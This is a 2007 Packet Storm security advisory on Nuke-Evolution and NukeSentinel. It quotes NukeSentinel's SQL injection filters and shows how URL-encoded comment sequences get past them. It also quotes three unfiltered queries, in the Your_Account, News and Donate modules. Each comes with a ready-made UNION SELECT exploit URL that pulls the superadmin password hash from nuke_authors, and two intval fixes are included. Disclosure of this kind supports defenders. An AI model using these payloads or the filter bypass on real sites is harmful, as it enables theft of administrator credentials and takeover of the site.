nuke-bypass.txt

2007-04-19T00:00:00
ID PACKETSTORM:56058
Type packetstorm
Reporter Aleksandar aka sale83
Modified 2007-04-19T00:00:00

Description

                                        
                                            `PROGRAM: Nuke-Evolution & NukeSentinel  
HOMEPAGE: http://www.nuke-evolution.com/  
VERSION: All versions  
BUG 1 NukeSentinel Bypass SQL Injection Protection  
BUG 2 Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities  
AUTHOR: Aleksandar  
  
NukeSentinel Bypass SQL Injection Protection  
  
nukesentinel.php Line 270-290  
  
******************************************  
// Check for UNION attack  
// Copyright 2004(c) Raven PHP Scripts  
$blocker_row = $blocker_array[1];  
if($blocker_row['activate'] > 0) {  
if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'*/union/*') OR stristr($nsnst_const['query_string_base64'],' union ')) {  
// block_ip($blocker_row);  
die("BLOCK IP 1 " );  
}  
}  
  
// Check for CLIKE attack  
// Copyright 2004(c) Raven PHP Scripts  
$blocker_row = $blocker_array[2];  
if($blocker_row['activate'] > 0) {  
if (  
stristr($nsnst_const['query_string'],'/*') OR   
stristr($nsnst_const['query_string_base64'],'/*') OR   
stristr($nsnst_const['query_string'],'*/') OR   
stristr($nsnst_const['query_string_base64'],'*/')) {  
// block_ip($blocker_row);  
die("BLOCK IP 2 " );  
}   
}  
  
  
******************************************  
  
Example(Bypass SQL Injection Protection):  
  
PHPNuke + NukeSentinel  
http://localhost/php-nuke/?%2f**%2fUNION%2f**%2fSELECT ... etc  
  
Nuke-Evolution + NukeSentinel  
http://localhost/nuke-evolution/?%2f**%2fUNION%2f**%2fSELECT .. etc  
  
  
  
Nuke-Evolution Basic 2.0.3  
  
Open source content management system, which features customizable blocks, modules, multilanguage support and themes. With importance on security, speed and usability.  
A PHP-Nuke based CMS with added security, functionality, and core improvements.   
  
Site:http://www.nuke-evolution.com/  
  
  
  
Your_Account/index.php  
  
Vulnerability code:  
********************************************************************  
case "userinfo":  
//include("modules/$module_name/public/userinfo.php");  
/*****[BEGIN]******************************************  
[ Mod: YA Merge v1.0.0 ]  
******************************************************/  
//The "$username" variable isn't filtered!!!  
$result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'<pre><br>");  
$uid = $db->sql_fetchrow($result);  
Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]);  
die();  
/*****[END]********************************************  
[ Mod: YA Merge v1.0.0 ]  
******************************************************/  
break;  
*********************************************************************  
  
POC Exploit:  
http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f**  
  
Results:  
MOZILA FIREFOX   
URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH  
  
MOZILA FIREFOX   
Live HTTP Headers - Firefox Add-ons  
  
http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH  
GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1  
Host: localhost:8080  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3  
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
  
  
  
  
News/read_article.php line 66  
  
Vulnerability code:  
++++++++++++++++++++++++++++++++++  
// //The "'$sid" variable isn't filtered!!!  
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";  
$result = $db->sql_query($sql);  
  
++++++++++++++++++++++++++++++++++  
  
POC Exploit:  
http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f**%2fUNION%2f**%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f**  
  
FIX  
++++++++++++++++++++++++++++++++++  
$sid= intval($sid); // FIX  
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";  
$result = $db->sql_query($sql);  
  
++++++++++++++++++++++++++++++++++  
  
  
  
Donate/index.php line 33 & 46  
Vulnerability code:  
********************************************************  
if (is_numeric($uid)) { // LOL :)   
$uid = intval($uid); :) LOL  
}  
  
....  
// Line 46  
  
} elseif (!empty($uid)) {   
include_once(NUKE_BASE_DIR.'header.php');  
$sql = "SELECT username FROM ".$user_prefix."_users where user_id='$uid'"; // BOOM - > SQL injection   
$result = $db->sql_query($sql);  
$row = $db->sql_fetchrow($result);  
$name = $row['username'];  
**********************************************************  
  
  
POC Exploit:  
http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1  
  
  
  
  
  
FIX  
  
++++++++++++++++++++++++++++++++++++++  
  
///if (is_numeric($uid)) { REMOVE THIS LINE  
$uid = intval($uid);   
///} REMOVE THIS LINE  
++++++++++++++++++++++++++++++++++++++  
  
  
  
  
Best Regards  
Aleksandar  
Programmer and Web Developer  
`